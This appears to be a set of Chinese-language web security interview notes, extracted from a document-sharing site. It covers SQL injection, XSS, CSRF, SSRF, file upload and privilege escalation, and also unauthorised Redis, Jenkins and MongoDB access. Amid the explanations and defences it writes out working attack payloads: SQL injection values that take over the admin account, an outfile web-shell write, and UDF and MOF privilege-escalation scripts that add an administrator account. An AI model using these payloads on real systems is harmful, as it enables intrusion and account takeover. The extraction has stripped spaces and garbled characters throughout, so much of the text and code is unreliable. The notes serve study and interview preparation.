homepage='$homepageWHEREUPDATEuserSETpassword='MD5($password)',id='$id'homepage='$homepageWHERE如果此SQL被修改成以下形式,就實(shí)現(xiàn)了注入1:修改homepage值為',userlevel='3之后SQL語(yǔ)句變?yōu)閁PDATEuserSETpassword='mypass',homepage='',userlevel='3'WHEREid='$id'userlevel為用戶級(jí)別2:修改password值為mypass)'WHEREusername='admin'#之后SQL語(yǔ)句變?yōu)閁PDATEuserSETpassword='MD5(mypass)'WHEREusername='admin'#)',homepage='$homepage'WHEREid='$id'3:修改id值為‘ORusername='admin’之后SQL語(yǔ)句變?yōu)閁PDATEuserSETpassword='MD5($password)',homepage='$homepage'WHEREid=''ORusername='admin'sql如何寫shell/單弓I號(hào)被過濾怎么辦寫shell:root權(quán)限,GPC關(guān)閉,知道文件路徑 outfile函數(shù)':81/sqli.php?id=1 into outfile'C:\\wamp64\\www\\phpinfo.php'FIELDSTERMINATEDBY'<?phpphpinfo();?>'、'http:〃:81/sqli.php?id=-1 union select1,0x3c3f70687020706870696e666f28293b203f3e,3,4 into outfile'C:\\wamp64\\www\\phpinfo.php''寬字節(jié)注入代替空格的方法%0a、%0b、%a0等/**/等注釋符<>mysql的網(wǎng)站注入,5.0以上和5.0以下有什么區(qū)別?5.0以下沒有information_schema 這個(gè)系統(tǒng)表,無(wú)法列表名等,只能暴力跑表名。

5.0以下是多用戶單操作, 5.0以上是多用戶多操做。XSSXSS原理反射型用戶提交的數(shù)據(jù)中可以構(gòu)造代碼來(lái)執(zhí)行,從而實(shí)現(xiàn)竊取用戶信息等攻擊。需要誘使用戶“點(diǎn)擊”一個(gè)惡意鏈接,才能攻擊成功儲(chǔ)存型存儲(chǔ)型XSS會(huì)把用戶輸入的數(shù)據(jù)“存儲(chǔ)”在服務(wù)器端。這種XSS具有很強(qiáng)的穩(wěn)定性。DOM型通過修改頁(yè)面的DOM節(jié)點(diǎn)形成的XSS,稱之為DOMBasedXSS。DOM型和反射型的區(qū)別反射型XSS:通過誘導(dǎo)用戶點(diǎn)擊,我們構(gòu)造好的惡意 payload才會(huì)觸發(fā)的XSS。反射型XSS的檢測(cè)我們?cè)诿看握?qǐng)求帶 payload的鏈接時(shí)頁(yè)面應(yīng)該是會(huì)帶有特定的畸形數(shù)據(jù)的。DOM型:通過修改頁(yè)面的 DOM節(jié)點(diǎn)形成的XSS。DOM-basedXSS由于是通過js代碼進(jìn)行dom操作產(chǎn)生的XSS,所以在請(qǐng)求的響應(yīng)中我們甚至不一定會(huì)得到相應(yīng)的畸形數(shù)據(jù)。根本區(qū)別在我看來(lái)是輸出點(diǎn)的不同。DOM型XSS自動(dòng)化測(cè)試或人工測(cè)試人工測(cè)試思路:找到類似document.write、innerHTML賦值、outterHTML賦值、window.location操作、寫javascript:后內(nèi)容、eval、setTimeout、setInterval等直全函數(shù)接執(zhí)行之類的函數(shù)點(diǎn)。找到其變量,回溯變量來(lái)源觀察是否可控,是否經(jīng)過安全函數(shù)自動(dòng)化測(cè)試參看道哥的博客,思路是從輸入入手,觀察變量傳遞的過程,最終檢查是否有在危險(xiǎn)函數(shù)輸出,中途是否有經(jīng)過安全函數(shù)。但是這樣就需要有一個(gè) javascript解析器,否則會(huì)漏掉一些通過 js執(zhí)行帶入的部分內(nèi)容。在回答這段問題的時(shí)候,由于平時(shí)對(duì)客戶的檢測(cè)中,基本是憑借不同功能點(diǎn)的功能加上經(jīng)驗(yàn)和直覺來(lái)進(jìn)行檢測(cè), 對(duì)不同類型的XSS檢測(cè)方式實(shí)際上并沒有太過細(xì)分的標(biāo)準(zhǔn)化檢測(cè)方式,所以回答的很爛。。。如何快速發(fā)現(xiàn)xss位置對(duì)于XSS怎么修補(bǔ)建議輸入點(diǎn)檢查:對(duì)用戶輸入的數(shù)據(jù)進(jìn)行合法性檢查,使用 filter過濾敏感字符或?qū)M(jìn)行編碼轉(zhuǎn)義,針對(duì)特定類型數(shù)據(jù)進(jìn)行格式檢查。針對(duì)輸入點(diǎn)的檢查最好放在服務(wù)器端實(shí)現(xiàn)。輸出點(diǎn)檢查:對(duì)變量輸出到HTML頁(yè)面中時(shí),對(duì)輸出內(nèi)容進(jìn)行編碼轉(zhuǎn)義,輸出在HTML中時(shí),對(duì)其進(jìn)行HTMLEncode,如果輸出在Javascript腳本中時(shí),對(duì)其進(jìn)行JavascriptEncode。對(duì)使用JavascriptEncode 的變量都放在引號(hào)中并轉(zhuǎn)義危險(xiǎn)字符,data部分就無(wú)法逃逸出引號(hào)外成為 code的一部分。還可以使用更加嚴(yán)格的方法,對(duì)所有數(shù)字字母之外的字符都使用十六進(jìn)制編碼。止匕外,要注意在瀏覽器中, HTML的解析會(huì)優(yōu)先于Javascript的解析,編碼的方式也需要考慮清楚,針對(duì)不同的輸出點(diǎn),我們防御XSS的方法可能會(huì)不同,這點(diǎn)可能在之后的文章會(huì)做下總結(jié)。除此之外,還有做 HTTPOnly對(duì)Cookie劫持做限制。XSS蠕蟲的產(chǎn)生條件正常情況下,一個(gè)是產(chǎn)生 XSS點(diǎn)的頁(yè)面不屬于self頁(yè)面,用戶之間產(chǎn)生交互行為的頁(yè)面,都可能造成XSSWorm的產(chǎn)生。不一定需要存儲(chǔ)型XSSCSRFCSRF原理CSRF是跨站請(qǐng)求偽造攻擊,由客戶端發(fā)起 ,是由于沒有在關(guān)鍵操作執(zhí)行時(shí)進(jìn)行是否由用戶自愿發(fā)起的確認(rèn)防御?驗(yàn)證Referer?添加tokentoken和referer做橫向?qū)Ρ?,誰(shuí)安全等級(jí)高?token安全等級(jí)更高,因?yàn)椴⒉皇侨魏畏?wù)器都可以取得 referer,如果從HTTPS跳到HTTP,也不會(huì)發(fā)送referer。并且FLASH一些版本中可以自定義 referer。但是token的話,要保證其足夠隨機(jī)且不可泄露。 (不可預(yù)測(cè)性原則)對(duì)referer的驗(yàn)證,從什么角度去做?如果做,怎么杜絕問題對(duì)header中的referer的驗(yàn)證,一個(gè)是空referer,一個(gè)是referer過濾或者檢測(cè)不完善。為了杜絕這種問題,在驗(yàn)證的白名單中,正則規(guī)則應(yīng)當(dāng)寫完善。針對(duì)token,對(duì)token測(cè)試會(huì)注意哪方面內(nèi)容,會(huì)對(duì)token的哪方面進(jìn)行測(cè)試?引用一段請(qǐng)教前輩的回答:針又ttoken的攻擊,一是對(duì)它本身的攻擊,重放測(cè)試一次性、分析加密規(guī)則、校驗(yàn)方式是否正確等,二是結(jié)合信息泄露漏洞對(duì)它的獲取,結(jié)合著發(fā)起組合攻擊信息泄露有可能是緩存、日志、 get,也有可能是利用跨站很多跳轉(zhuǎn)登錄的都依賴token,有一個(gè)跳轉(zhuǎn)漏洞加反射型跨站就可以組合成登錄劫持了另外也可以結(jié)合著其它業(yè)務(wù)來(lái)描述 token的安全性及設(shè)計(jì)不好怎么被繞過比如搶紅包業(yè)務(wù)之類的SSRFSSRF(Server-SideRequestForgery:服務(wù)器端請(qǐng)求偽造)是一種由攻擊者構(gòu)造形成由服務(wù)端發(fā)起請(qǐng)求的一個(gè)安全漏洞。一般情況下, SSRF攻擊的目標(biāo)是從外網(wǎng)無(wú)法訪問的內(nèi)部系統(tǒng)。(正是因?yàn)樗怯煞?wù)端發(fā)起的,所以它能夠請(qǐng)求到與它相連而與外網(wǎng)隔離的內(nèi)部系統(tǒng))SSRF形成的原因大都是由于服務(wù)端提供了從其他服務(wù)器應(yīng)用獲取數(shù)據(jù)的功能且沒有對(duì)目標(biāo)地址做過濾與限制。比如從指定 URL地址獲取網(wǎng)頁(yè)文本內(nèi)容,加載指定地址的圖片,下載等等。檢測(cè)SSRF漏洞的驗(yàn)證方法:1)因?yàn)镾SRF漏洞是讓服務(wù)器發(fā)送請(qǐng)求的安全漏洞, 所以我們就可以通過抓包分析發(fā)送的請(qǐng)求是否是由服務(wù)器的發(fā)送的,從而來(lái)判斷是否存在 SSRF漏洞2)在頁(yè)面源碼中查找訪問的資源地址,如果該資源地址類型為/xxx.php?image= (地址)的就可能存在SSRF漏洞4SSRF漏洞的成因防御繞過成因:模擬服務(wù)器對(duì)其他服務(wù)器資源進(jìn)行請(qǐng)求,沒有做合法性驗(yàn)證。利用:構(gòu)造惡意內(nèi)網(wǎng)IP做探測(cè),或者使用其余所支持的協(xié)議對(duì)其余服務(wù)進(jìn)行攻擊。防御:禁止跳轉(zhuǎn),限制IP,IP格式的繞過,針對(duì)協(xié)議,內(nèi)外網(wǎng)限制, URLIP,IP格式的繞過,針對(duì)URL,惡意URL增添其他字符, @之類的。301跳轉(zhuǎn)+dnsrebindding上傳文件上傳漏洞原理由于程序員在對(duì)用戶文件上傳部分的控制不足或者處理缺陷,而導(dǎo)致用戶可以越過其本身權(quán)限向服務(wù)器上傳可執(zhí)行的動(dòng)態(tài)腳本文件常見的上傳繞過方式?前端js驗(yàn)證:禁用js/burp改包?大小寫?雙重后綴名?過濾繞過pphphp->php防護(hù)?文件上傳目錄設(shè)置為不可執(zhí)行?使用白名單判斷文件上傳類型?用隨機(jī)數(shù)改寫文件名和路徑審查上傳點(diǎn)的元素有什么意義?有些站點(diǎn)的上傳文件類型的限制是在前端實(shí)現(xiàn)的,這時(shí)只要增加上傳類型就能突破限制了。文件包含原理引入一段用戶能控制的腳本或代碼,并讓服務(wù)器端執(zhí)行 (1)include()等函數(shù)通過動(dòng)態(tài)變量的方式引入需要包含的文件;( 2)用戶能夠控制該動(dòng)態(tài)變量。導(dǎo)致文件包含的函數(shù)PHP:include。,include_once(),require。,re-quire_once(),fopen(),readfile(),JSP/Servlet:ava.io.File(),java.io.Fil-eReader(),…ASP:includefile,includevirtual,本地文件包含能夠打開并包含本地文件的漏洞,被稱為本地文件包含漏洞XXE邏輯漏洞金融行業(yè)常見邏輯漏洞單針對(duì)金融業(yè)務(wù)的 主要是數(shù)據(jù)的篡改(涉及金融數(shù)據(jù),或部分業(yè)務(wù)的判斷數(shù)據(jù) ),由競(jìng)爭(zhēng)條件或者設(shè)計(jì)不當(dāng)引起的薄羊毛, 交易/訂單信息泄露,水平越權(quán)對(duì)別人的賬戶查看或惡意操作,交易或業(yè)務(wù)步驟繞過。溢出中間人攻擊SSL握手的過中間人攻擊是一個(gè)(缺乏)相互認(rèn)證的攻擊;由于客戶端與服務(wù)器之間在SSL握手的過防御中間人攻擊的方案通?;谝幌聨追N技術(shù).公鑰基礎(chǔ)建設(shè)PKI使用PKI相互認(rèn)證機(jī)制,客戶端驗(yàn)證服務(wù)器,服務(wù)器驗(yàn)證客戶端;上述兩個(gè)例子中都是只驗(yàn)證服務(wù)器,這樣就造成了 SSL握手環(huán)節(jié)的漏洞,而如果使用相互認(rèn)證的的話,基本可以更強(qiáng)力的相互認(rèn)證.延遲測(cè)試使用復(fù)雜加密哈希函數(shù)進(jìn)行計(jì)算以造成數(shù)十秒的延遲; 如果雙方通常情況下都要花費(fèi) 20秒來(lái)計(jì)算,并且整個(gè)通訊花費(fèi)了 60秒計(jì)算才到達(dá)對(duì)方,這就能表明存在第三方中間人。.使用其他形式的密鑰交換形式ARP欺騙原理:每臺(tái)主機(jī)都有一個(gè)ARP緩存表,緩存表中記錄了 IP地址與MAC地址的對(duì)應(yīng)關(guān)系,而局域網(wǎng)數(shù)據(jù)傳輸依靠的是 MAC地址。在ARP緩存表機(jī)制存在一個(gè)缺陷,就是當(dāng)請(qǐng)求主機(jī)收到ARP應(yīng)答包后,不會(huì)去驗(yàn)證自己是否向?qū)Ψ街鳈C(jī)發(fā)送過 ARP請(qǐng)求包,就直接把這個(gè)返回包中的IP地址與MAC地址的對(duì)應(yīng)關(guān)系保存進(jìn) ARP緩存表中,如果原有相同IP對(duì)應(yīng)關(guān)系,原有的則會(huì)被替換。這樣攻擊者就有了偷聽主機(jī)傳輸?shù)臄?shù)據(jù)的可能防護(hù).在主機(jī)綁定網(wǎng)關(guān)MAC與IP地址為靜態(tài)(默認(rèn)為動(dòng)態(tài)),命令:arp-s網(wǎng)關(guān)IP網(wǎng)關(guān)MAC.在網(wǎng)關(guān)綁定主機(jī)MAC與IP地址.使用ARP防火墻DDOSDdos原理利用合理的請(qǐng)求造成資源過載,導(dǎo)致服務(wù)不可用syn洪流的原理偽造大量的源IP地址,分別向服務(wù)器端發(fā)送大量的 SYN包,此時(shí)服務(wù)器端會(huì)返回SYN/ACK包,因?yàn)樵吹刂肥莻卧斓?,所以偽造?IP并不會(huì)應(yīng)答,服務(wù)器端沒有收到偽造IP的回應(yīng),會(huì)重試3?5次并且等待一個(gè)SYNTime(一般為30秒至2分鐘),如果超時(shí)則丟棄這個(gè)連接。攻擊者大量發(fā)送這種偽造源地址的 SYN請(qǐng)求,服務(wù)器端將會(huì)消耗非常多的資源(CPU和內(nèi)存)來(lái)處理這種半連接,同時(shí)還要不斷地對(duì)這些 IP進(jìn)行SYN+ACK重試。最后的結(jié)果是服務(wù)器無(wú)暇理睬正常的連接請(qǐng)求,導(dǎo)致拒絕服務(wù)。CC攻擊原理對(duì)一些消耗資源較大的應(yīng)用頁(yè)面不斷發(fā)起正常的請(qǐng)求,以達(dá)到消耗服務(wù)端資源的目的。DDOS防護(hù)SYNCookie/SYNProxy、safereset等算法。SYNCookie的主要思想是為每一個(gè)IP地址分配一個(gè)"Cookie”,并統(tǒng)計(jì)每個(gè)IP地址的訪問頻率。如果在短時(shí)間內(nèi)收到大量的來(lái)自同一個(gè)IP地址的數(shù)據(jù)包,則認(rèn)為受到攻擊,之后來(lái)自這個(gè) IP地址的包將被丟棄。提權(quán)mysql兩種提權(quán)方式

udf提權(quán),mof提權(quán)Mysql_UDF提權(quán)要求:1.目標(biāo)系統(tǒng)是Windows(Win2000,XP,Win2003);2.擁有MYSQL的某個(gè)用戶賬號(hào),此賬號(hào)必須有對(duì) mysql的insert和delete權(quán)限以創(chuàng)建和拋棄函數(shù) 3.有root賬號(hào)密碼導(dǎo)出udf:MYSQL5.1 以上版本,必須要把 udf.dll文件放到MYSQL安裝目錄下的lib\plugin 文件夾下才能創(chuàng)建自定義函數(shù) 可以再mysql里輸入select@@basedirshowvariableslike,%plugins%,尋找mysql安裝路徑提權(quán):使用SQL語(yǔ)句創(chuàng)建功能函數(shù)。語(yǔ)法:CreateFunction函數(shù)名(函數(shù)名只能為下面列表中的其中之一)returnsstringsoname '導(dǎo)出的DLL路徑';createfunctioncmdshellreturnsstringsoname 'udf.dll'selectcmdshell('netuserarscharsch/add');selectcmdshell('netlocalgroupadministratorsarsch /add');dropfunctioncmdshell;該目錄默認(rèn)是不存在的,這就需要我們使用 webshell找到MYSQL的安裝目錄,并在安裝目錄下創(chuàng)建lib\plugin 文件夾,然后將udf.dll文件導(dǎo)出到該目錄即可。Mysqlmof提權(quán)#pragmanamespace("\\\\.\\root\\subscription")instanceof__EventFilteras$EventFilter{EventNamespace="Root\\Cimv2";Name="filtP2";Query="Select*From__InstanceModificationEvent"WhereTargetinstanceIsa\"Win32_LocalTime\"""AndTargetinstance.Second=5";QueryLanguage="WQL";);instanceofActiveScriptEventConsumeras$Consumer{Name="consPCSV2";ScriptingEngine="JScript";userScriptText=user"varWSH=newActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe

waitalone/add\")";);instanceof__FilterToConsumerBinding( 一Consumer=$Consumer;Filter=$EventFilter;);其中的第18行的命令,上傳前請(qǐng)自己更改。2、執(zhí)行l(wèi)oad_file及intodumpfile 把文件導(dǎo)出到正確的位置即可。select load file('c:/wmpub/nullevt.mof) into dumpfile'c:/windows/system32/wbem/mof/nullevt.mov'執(zhí)行成功后,即可添加一個(gè)普通用戶,然后你可以更改命令,再上傳導(dǎo)出執(zhí)行把用戶提升到管理員權(quán)限,然后3389連接之就ok了。特殊漏洞Struts2-045Redis未授權(quán)訪問產(chǎn)生原因Redis默認(rèn)情況下,會(huì)綁定在:6379,這樣將會(huì)將 Redis服務(wù)暴露到公網(wǎng)上,如果在沒有開啟認(rèn)證的情況下,可以導(dǎo)致任意用戶在可以訪問目標(biāo)服務(wù)器的情況下未授權(quán)訪問Redis以及讀取Redis的數(shù)據(jù)。攻擊者在未授權(quán)訪問 Redis的情況下可以利用Redis的相關(guān)方法,可以成功在Redis服務(wù)器上寫入公鑰,進(jìn)而可以使用對(duì)應(yīng)私鑰直接登錄目標(biāo)服務(wù)器利用條件和方法條件:redis服務(wù)以root賬戶運(yùn)行

redis無(wú)密碼或弱密碼進(jìn)行認(rèn)證redis監(jiān)聽在公網(wǎng)上方法:?通過Redis的INFO命令,可以查看服務(wù)器相關(guān)的參數(shù)和敏感信息 ,為攻擊者的后續(xù)滲透做鋪墊?上傳SSH公鑰獲得SSH登錄權(quán)限?通過crontab反彈shell?slave主從模式利用修復(fù)?密碼驗(yàn)證?降權(quán)運(yùn)行?限制ip/修改端口Jenkins 未授權(quán)訪問攻擊者通過未授權(quán)訪問進(jìn)入腳本命令執(zhí)行界面執(zhí)行攻擊指令println"ifconfig-a".execute().text 執(zhí)行一1些系統(tǒng)命令,利用Wget下載webshellMongoDB 未授權(quán)訪問開啟MongoDB 服務(wù)時(shí)不添加任何參數(shù)時(shí),默認(rèn)是沒有權(quán)限驗(yàn)證的,而且可以遠(yuǎn)程訪問數(shù)據(jù)庫(kù),登錄的用戶可以通過默認(rèn)端口無(wú)需密碼對(duì)數(shù)據(jù)庫(kù)進(jìn)行增、刪、改、查等任意高危操作。防護(hù)1、為MongoDB添加認(rèn)證:1)MongoDB 啟動(dòng)時(shí)添加-auth參數(shù)2)給MongoDB添加用戶:useadmin#使用admin庫(kù)db.addUser(root”,123456”)#添加用戶名root密碼123456的用戶db.auth(foot”,123456")#驗(yàn)證下是否添加成功, 返回1說明成功2、禁用HTTP和REST端口MongoDB 自身帶有一個(gè) HTTP服務(wù)和并支持REST接口。在2.6以后這些接口默認(rèn)是關(guān)閉的。 mongoDB默認(rèn)會(huì)使用默認(rèn)端口監(jiān)聽web服務(wù),一般不需要通過 web方式進(jìn)行遠(yuǎn)程管理,建議禁用。修改配置文件或在啟動(dòng)的時(shí)候選擇-nohttpinterface參數(shù)nohttpinterface=false3、限制綁定IP啟動(dòng)時(shí)加入?yún)?shù)-bind_ip或在/etc/mongodb.conf文件中添加以下內(nèi)容:bind_ip=Memcache未授權(quán)訪問Memcached是一套常用的key-value緩存系統(tǒng),由于它本身沒有權(quán)限控制模塊,所以對(duì)公網(wǎng)開放的 Memcache 服務(wù)很容易被攻擊者掃描發(fā)現(xiàn),攻擊者通過命令交互可直接讀取Memcached 中的敏感信息。利用1、登錄機(jī)器執(zhí)行netstat-an|more 命令查看端口監(jiān)聽情況。回顯:11211表示在所有網(wǎng)卡進(jìn)行監(jiān)聽,存在 memcached 未授權(quán)訪問漏洞。2、telnet11211 ,或nc-vv11211 ,提示連接成功表示漏洞存在漏洞加固?1、設(shè)置memchached 只允許本地訪問?2、禁止外網(wǎng)訪問 Memcached11211端口?3、編譯時(shí)加上-enable-sasl,啟用SASL認(rèn)證FFMPEG本地文件讀取漏洞原理通過調(diào)用加密API將payload加密放入一個(gè)會(huì)被執(zhí)行的段字節(jié)中。但是具體回答工程中我只回答道了 SSRF老洞,m3u8頭,偏移量,加密。安全知識(shí)WEB常用WEB開發(fā)JAVA框架STRUTS,SPRING常見的java框架漏洞其實(shí)面試官問這個(gè)問題的時(shí)候我不太清楚他要問什么,我提到struts的045048,java常見反序列化。045錯(cuò)誤處理引入了ognl表達(dá)式048封裝action的過程中有一步調(diào)用 getstackvalue 遞歸獲取ognl表達(dá)式反序列化操作對(duì)象,通過手段引入。apachecommon 的反射機(jī)制、readobject的重寫,其實(shí)具體的我也記不清楚。。。然后這部分就結(jié)束了同源策略同源策略限制不同源對(duì)當(dāng)前 document 的屬性內(nèi)容進(jìn)行讀取或設(shè)置。 不同源的區(qū)分:協(xié)議、域名、子域名、 IP、端口,以上有不同時(shí)即不同源。Jsonp安全攻防技術(shù),怎么寫Jsonp的攻擊頁(yè)面?涉及到Jsonp的安全攻防內(nèi)容JSON劫持、Callback可定義、JSONP內(nèi)容可定義、 Content-type不為json。攻擊頁(yè)面JSON劫持,跨域劫持敏感信息,頁(yè)面類似于functionwooyun(v){alert(v.username);}</script><scriptsrc="/?o=sso&m=info&func=wooyun"></script>Content-type不正確情況下,JSONP和Callback內(nèi)容可定義可造成XSS。JSONP和FLASH及其他的利用參照知道創(chuàng)宇的 JSONP安全攻防技術(shù)。PHPphp中命令執(zhí)行涉及到的函數(shù)1,代碼執(zhí)行:eval()

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

最新文檔

評(píng)論

0/150

提交評(píng)論